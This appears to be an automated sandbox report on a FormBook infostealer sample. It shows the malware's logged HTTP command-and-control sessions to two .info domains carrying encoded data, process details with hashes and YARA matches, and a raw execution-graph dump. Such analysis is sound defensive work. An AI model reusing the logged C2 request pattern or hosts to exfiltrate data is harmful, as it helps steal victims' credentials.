                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          21 | 192.168.2.10 | 49996 | 13.248.169.48 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:49.757082939 CET | 857 | OUT | POST /wvsm/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sfantulandrei.info
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.sfantulandrei.info
                                                          Referer: http://www.sfantulandrei.info/wvsm/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Ascii: WLtH=K3B/WoIvcrplLRhWtPqKF7dLK9LOoAu6GdYtp71hK+pphVxDu5gMFmsAiDcCAzPrOryt1nFvX8v2587Qpg+ergi+nC1h3Fu1LwaHw9YEYdrnRklxdlHmPXlwqZvSbzthG3IY4sPi/SIyowu+tulukzZQDlR/vYtvVSJQjYH6ott175giExRhF5t0k1Cb
                                                          Jan 11, 2025 03:33:50.195827007 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          22 | 192.168.2.10 | 49997 | 13.248.169.48 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:52.309338093 CET | 881 | OUT | POST /wvsm/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sfantulandrei.info
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.sfantulandrei.info
                                                          Referer: http://www.sfantulandrei.info/wvsm/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Ascii: WLtH=K3B/WoIvcrplRxRWiPWKAbdMGdLO9wumGdUtp6AkKM9phwVDv8MMLGsA2TcHfjOlOr+l1kdvX9P255HQpzWdpwi4ui1Z01u1LwaHw9M9YdTnQWxxHAzlRHl/8JvSfztlG3I+4u6H/Qwyoxe+s7FvuzZWMFQIj6E1Rh1bhavyoflr8YdlVgw2WOx6qz3x/L171IWhuidkUzcea3RDTA==
                                                          Jan 11, 2025 03:33:52.749594927 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          23 | 192.168.2.10 | 49998 | 13.248.169.48 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:54.855760098 CET | 1894 | OUT | POST /wvsm/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sfantulandrei.info
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.sfantulandrei.info
                                                          Referer: http://www.sfantulandrei.info/wvsm/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:33:55.292889118 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          24 | 192.168.2.10 | 49999 | 13.248.169.48 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:57.397439957 CET | 587 | OUT | GET /wvsm/?W0-=CzJDBfQxOTFPL&WLtH=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rG+uhWVx8heXLgKcp/EaPre6bkVIFA== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sfantulandrei.info
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:34:00.883013010 CET | 375 | IN | HTTP/1.1 200 OK
                                                          content-type: text/html
                                                          date: Sat, 11 Jan 2025 02:34:00 GMT
                                                          content-length: 254
                                                          connection: close
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?W0-=CzJDBfQxOTFPL&WLtH=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rG+uhWVx8heXLgKcp/EaPre6bkVIFA=="}</script></head></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          25 | 192.168.2.10 | 50000 | 104.21.64.1 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:34:05.944127083 CET | 836 | OUT | POST /0pqe/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.mffnow.info
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.mffnow.info
                                                          Referer: http://www.mffnow.info/0pqe/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Ascii: WLtH=XLwieY+at8m7er3pCgM4rxqqmsRI/YuweDb7rZG4A2ezBNsN63CL0e5Y9EduUZmtLkDit1ARMaRAvPD3NRTiZnKaPQ4PsIrL3p9qgaz0CItDzRvaNdCEF3ansXvkbFyGSIZtf8SWqKMk7LIyi0GaqIgwbkeb+ubRhr5Bl3+Sp6Dxo7JsmGpj/sL/8owa


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          26 | 192.168.2.10 | 50001 | 104.21.64.1 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:34:08.499474049 CET | 860 | OUT | POST /0pqe/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.mffnow.info
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.mffnow.info
                                                          Referer: http://www.mffnow.info/0pqe/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Ascii: WLtH=XLwieY+at8m7fLnpRRM4jxqr/cRI24u8eDH7rYyoAD2zPPkN1S+L4+5Y3kdvJpm2LkOdt18RMZtAvLH3MirjY3KPJQ4BjorL3p9qga3KCIFDzi3aN8CFZnakl3vkN1yKSIZPf9OoqI0k7L4yigqdxYh5E0f4/+6KnoRxjB++/5/ira0r3XI0sbXxyuFwPeSR5OemKGDiccv34lrpIg==


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.10 | 50002 | 104.21.64.1 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:34:11.044168949 CET | 1873 | OUT | POST /0pqe/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.mffnow.info
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.mffnow.info
                                                          Referer: http://www.mffnow.info/0pqe/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Ascii: WLtH=XLwieY+at8m7fLnpRRM4jxqr/cRI24u8eDH7rYyoADuzP6wN0xWL5+5YxUdqJpn0LkWZt1xkMfhAgIP3YDrjW3KPLQ4AsIqR3ptUgaHKCIFDzjHaLtCFbnansXvobFyuSIB1f9K4t8Ak6vUyjTSd9Yh3F0fe/+2vnoNbjBjb/6viovlxr1gL3aLH39MVFICpxej0CVzXJvq/uBiVU3Uek40K+Yn8dSSkAfcX6cJc1jmDOT0g7hHL4tsKJvxXixOTAXkyuKfJpDLzjWCu/IQrXrtjVuWSWxwEhhirt+QCNQJ1BqDLJfOc6Vj3FrxjuDZNA8lXiad73JVMEj2tOi/cT3WWY5ZPZPUekutpu2ta/EBQU5BaFS8tor7Gn3+r93gk1gGmZrPvIfsvC9RulsRHMk2bR02fnquYsyOMor54cIvPQ2d3+uqtDG2nfadIWtUr+Vj6uKNGvxYhrUYo7l0kCD5XI2KiLeBEBmtnADC2XD/cpA3S+R8sm8DeXP2R0YXxv99YW0IdxPc6a1tQadZHLw4Zm7uzhXiQNL/T8L+osm/iM2+qrjNDJMJ9fVwMFIAxCTo+nMspXF5LzrbEt6ArBc3YXECjGBuVH31WnLttb3iGcFBxMg5/S/l+tLAM7lowS4GX5uJ9c2K8kk4MvVN8hSEgaxf2iWZ0Gmu84DC3t2gcHyX+2w3Ri0gpl3M+uXCCWs1W1KQURRUQL9Tr9l8ZlNatUzZEgIeB+gz8PP4iaqYqwTCurDWpRaCWObpBz5B7A8ZlEISHhm7jfxPA2xLsjESEZKXG8p38JuInaLodyM6ODX5ByEd9c8NGpQraoWO22dSvBhvqhRkwM3J+0gYSej8kbpMm57nYCirrnjwW3txRghXrlaNLeJTAHqaWUfRp0S2Djefuws6NX335tIWR2q1IIU0FWC+1glggi8XwVMKwFFvdBqNlrH7UdK+bgWQV4HAlJ/NuaN//3dlSjlRGZXniCM6Nf+Ixuv3LU0+xWw9DqXE [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.10 | 50003 | 104.21.64.1 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:34:13.586146116 CET | 580 | OUT | GET /0pqe/?WLtH=aJYCdvvPx+uKS5Ogd0A7vBDK6OZ68qCTbFX0p5fCFhilae8HyBK0z8Ue4klxYsqgBES9oGplOKNa3q3+NTywXADjEmAOq6f7maBI/5zBJpNE8z7ORg==&W0-=CzJDBfQxOTFPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.mffnow.info
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:34:15.254126072 CET | 748 | IN | HTTP/1.1 567 unknown
                                                          Date: Sat, 11 Jan 2025 02:34:15 GMT
                                                          Content-Length: 17
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ipor0WTLZeT4td727KpOuBTaHuGuEtLMUuDchrjhRd06jSPvUYXxZTPqEgDl%2FtVPVbN1wziuTkbKA2%2FkG9GqITz0kdJPnShXklfqkRaGJz5uqr90wV1r1pi8GBPvuqxRh54%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 900181ad6dd0c358-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=580&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                          Data Ascii: Request too large



                                                          Target ID:0
                                                          Start time:21:31:10
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\SpCuEoekPa.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\SpCuEoekPa.exe"
                                                          Imagebase:0x360000
                                                          File size:1'192'448 bytes
                                                          MD5 hash:9A01CD212369451960342E9CCF98C51D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:21:31:11
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\SpCuEoekPa.exe"
                                                          Imagebase:0x40000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1680899176.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1681689182.0000000003720000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1682428775.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:21:31:41
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe"
                                                          Imagebase:0x770000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3152822686.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:7
                                                          Start time:21:31:43
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\comp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\comp.exe"
                                                          Imagebase:0x8d0000
                                                          File size:23'552 bytes
                                                          MD5 hash:712EF348F7032AA1C80D24600BA5452D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3150179402.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3150964448.0000000002970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3150708105.0000000002920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:8
                                                          Start time:21:31:57
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe"
                                                          Imagebase:0x770000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3155508857.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:10
                                                          Start time:21:32:10
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff613480000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:3.4%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:7.5%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:147
101601->101602 101603 383138 _doexit __IsNonwritableInCurrentImage 101601->101603 101602->101603 101603->101522 101605 3647ea 101604->101605 101615 364889 101604->101615 101606 364824 IsThemeActive 101605->101606 101680 38336c 101606->101680 101610 364850 101692 3648fd SystemParametersInfoW SystemParametersInfoW 101610->101692 101612 36485c 101693 363b3a 101612->101693 101614 364864 SystemParametersInfoW 101614->101615 101615->101526 101616->101500 101617->101504 101618->101511 101622->101527 101623->101530 101624->101536 101625->101538 101626->101542 101627->101543 101630 3887dc 101628->101630 101631 388817 101630->101631 101633 3887fa 101630->101633 101637 3951f6 101630->101637 101631->101547 101634 389de6 TlsSetValue 101631->101634 101633->101630 101633->101631 101645 38a132 Sleep 101633->101645 101634->101551 101635->101554 101636->101550 101638 395201 101637->101638 101641 39521c 101637->101641 101639 39520d 101638->101639 101638->101641 101646 388b28 58 API calls __getptd_noexit 101639->101646 101640 39522c RtlAllocateHeap 101640->101641 101643 395212 101640->101643 101641->101640 101641->101643 101647 3833a1 DecodePointer 101641->101647 101643->101630 101645->101633 101646->101643 101647->101641 101648->101570 101649->101571 101650->101562 101651->101578 101652->101581 101653->101591 101655 388dd1 101654->101655 101660 388c59 101655->101660 101659 388dec 101659->101597 101661 388c73 _memset __call_reportfault 101660->101661 101662 388c93 IsDebuggerPresent 101661->101662 101668 38a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101662->101668 101665 388d7a 101667 38a140 GetCurrentProcess TerminateProcess 101665->101667 101666 388d57 __call_reportfault 101669 38c5f6 101666->101669 101667->101659 101668->101666 101670 38c5fe 101669->101670 101671 38c600 IsProcessorFeaturePresent 101669->101671 101670->101665 101673 39590a 101671->101673 101676 3958b9 5 API calls 2 library calls 101673->101676 101675 3959ed 101675->101665 101676->101675 101678 38a4d4 
EncodePointer 101677->101678 101678->101678 101679 38a4ee 101678->101679 101679->101601 101681 389c0b __lock 58 API calls 101680->101681 101682 383377 DecodePointer EncodePointer 101681->101682 101745 389d75 LeaveCriticalSection 101682->101745 101684 364849 101685 3833d4 101684->101685 101686 3833f8 101685->101686 101687 3833de 101685->101687 101686->101610 101687->101686 101746 388b28 58 API calls __getptd_noexit 101687->101746 101689 3833e8 101747 388db6 9 API calls __wsopen_nolock 101689->101747 101691 3833f3 101691->101610 101692->101612 101694 363b47 __write_nolock 101693->101694 101695 367667 59 API calls 101694->101695 101696 363b51 GetCurrentDirectoryW 101695->101696 101748 363766 101696->101748 101698 363b7a IsDebuggerPresent 101699 39d272 MessageBoxA 101698->101699 101700 363b88 101698->101700 101703 39d28c 101699->101703 101701 363c61 101700->101701 101700->101703 101704 363ba5 101700->101704 101702 363c68 SetCurrentDirectoryW 101701->101702 101707 363c75 Mailbox 101702->101707 101947 367213 59 API calls Mailbox 101703->101947 101829 367285 101704->101829 101707->101614 101708 39d29c 101713 39d2b2 SetCurrentDirectoryW 101708->101713 101710 363bc3 GetFullPathNameW 101711 367bcc 59 API calls 101710->101711 101712 363bfe 101711->101712 101845 37092d 101712->101845 101713->101707 101716 363c1c 101717 363c26 101716->101717 101948 3b874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101716->101948 101861 363a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101717->101861 101721 39d2cf 101721->101717 101723 39d2e0 101721->101723 101724 364706 61 API calls 101723->101724 101727 39d2e8 101724->101727 101725 363c43 101869 3709d0 101725->101869 101726 363c30 101726->101725 101728 36434a 68 API calls 101726->101728 101730 367de1 59 API calls 101727->101730 101728->101725 101732 39d2f5 101730->101732 101731 363c4e 101731->101701 101946 36443a Shell_NotifyIconW _memset 101731->101946 101733 39d2ff 101732->101733 101734 39d324 101732->101734 101736 
367cab 59 API calls 101733->101736 101737 367cab 59 API calls 101734->101737 101738 39d30a 101736->101738 101739 39d320 GetForegroundWindow ShellExecuteW 101737->101739 101741 367b2e 59 API calls 101738->101741 101742 39d354 Mailbox 101739->101742 101743 39d317 101741->101743 101742->101701 101744 367cab 59 API calls 101743->101744 101744->101739 101745->101684 101746->101689 101747->101691 101749 367667 59 API calls 101748->101749 101750 36377c 101749->101750 101949 363d31 101750->101949 101752 36379a 101753 364706 61 API calls 101752->101753 101754 3637ae 101753->101754 101755 367de1 59 API calls 101754->101755 101756 3637bb 101755->101756 101963 364ddd 101756->101963 101759 39d173 102019 3c955b 101759->102019 101760 3637dc Mailbox 101764 368047 59 API calls 101760->101764 101763 39d192 101766 382d55 _free 58 API calls 101763->101766 101767 3637ef 101764->101767 101768 39d19f 101766->101768 101987 36928a 101767->101987 101770 364e4a 84 API calls 101768->101770 101772 39d1a8 101770->101772 101776 363ed0 59 API calls 101772->101776 101773 367de1 59 API calls 101774 363808 101773->101774 101990 3684c0 101774->101990 101778 39d1c3 101776->101778 101777 36381a Mailbox 101779 367de1 59 API calls 101777->101779 101780 363ed0 59 API calls 101778->101780 101781 363840 101779->101781 101782 39d1df 101780->101782 101783 3684c0 69 API calls 101781->101783 101784 364706 61 API calls 101782->101784 101786 36384f Mailbox 101783->101786 101785 39d204 101784->101785 101787 363ed0 59 API calls 101785->101787 101789 367667 59 API calls 101786->101789 101788 39d210 101787->101788 101790 368047 59 API calls 101788->101790 101791 36386d 101789->101791 101792 39d21e 101790->101792 101994 363ed0 101791->101994 101794 363ed0 59 API calls 101792->101794 101796 39d22d 101794->101796 101802 368047 59 API calls 101796->101802 101798 363887 101798->101772 101799 363891 101798->101799 101800 382efd _W_store_winword 60 API calls 101799->101800 101801 36389c 101800->101801 101801->101778 101803 
3638a6 101801->101803 101804 39d24f 101802->101804 101805 382efd _W_store_winword 60 API calls 101803->101805 101806 363ed0 59 API calls 101804->101806 101807 3638b1 101805->101807 101808 39d25c 101806->101808 101807->101782 101809 3638bb 101807->101809 101808->101808 101810 382efd _W_store_winword 60 API calls 101809->101810 101811 3638c6 101810->101811 101811->101796 101812 363907 101811->101812 101814 363ed0 59 API calls 101811->101814 101812->101796 101813 363914 101812->101813 101815 3692ce 59 API calls 101813->101815 101816 3638ea 101814->101816 101817 363924 101815->101817 101818 368047 59 API calls 101816->101818 101819 369050 59 API calls 101817->101819 101820 3638f8 101818->101820 101821 363932 101819->101821 101822 363ed0 59 API calls 101820->101822 102010 368ee0 101821->102010 101822->101812 101824 36928a 59 API calls 101826 36394f 101824->101826 101825 368ee0 60 API calls 101825->101826 101826->101824 101826->101825 101827 363ed0 59 API calls 101826->101827 101828 363995 Mailbox 101826->101828 101827->101826 101828->101698 101830 367292 __write_nolock 101829->101830 101831 39ea22 _memset 101830->101831 101832 3672ab 101830->101832 101835 39ea3e GetOpenFileNameW 101831->101835 101833 364750 60 API calls 101832->101833 101834 3672b4 101833->101834 102628 380791 101834->102628 101837 39ea8d 101835->101837 101838 367bcc 59 API calls 101837->101838 101840 39eaa2 101838->101840 101840->101840 101842 3672c9 102646 36686a 101842->102646 101846 37093a __write_nolock 101845->101846 102884 366d80 101846->102884 101848 37093f 101849 363c14 101848->101849 102895 37119e 90 API calls 101848->102895 101849->101708 101849->101716 101851 37094c 101851->101849 102896 373ee7 92 API calls Mailbox 101851->102896 101853 370955 101853->101849 101854 370959 GetFullPathNameW 101853->101854 101855 367bcc 59 API calls 101854->101855 101856 370985 101855->101856 101857 367bcc 59 API calls 101856->101857 101858 370992 101857->101858 101859 3a4cab _wcscat 101858->101859 101860 
367bcc 59 API calls 101858->101860 101860->101849 101862 363ab0 LoadImageW RegisterClassExW 101861->101862 101863 39d261 101861->101863 102929 363041 7 API calls 101862->102929 102930 3647a0 LoadImageW EnumResourceNamesW 101863->102930 101866 363b34 101868 3639d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101866->101868 101867 39d26a 101868->101726 101870 3a4cc3 101869->101870 101884 3709f5 101869->101884 102987 3c9e4a 90 API calls 4 library calls 101870->102987 101872 370cfa 101872->101731 101874 370ee4 101874->101872 101876 370ef1 101874->101876 102985 371093 332 API calls Mailbox 101876->102985 101877 370a4b PeekMessageW 101945 370a05 Mailbox 101877->101945 101879 370ef8 LockWindowUpdate DestroyWindow GetMessageW 101879->101872 101882 370f2a 101879->101882 101881 3a4e81 Sleep 101881->101945 101886 3a5c58 TranslateMessage DispatchMessageW GetMessageW 101882->101886 101883 370ce4 101883->101872 102984 371070 10 API calls Mailbox 101883->102984 101884->101945 102988 369e5d 60 API calls 101884->102988 102989 3b6349 332 API calls 101884->102989 101886->101886 101887 3a5c88 101886->101887 101887->101872 101888 370ea5 TranslateMessage DispatchMessageW 101889 370e43 PeekMessageW 101888->101889 101889->101945 101890 3a4d50 TranslateAcceleratorW 101890->101889 101890->101945 101891 369e5d 60 API calls 101891->101945 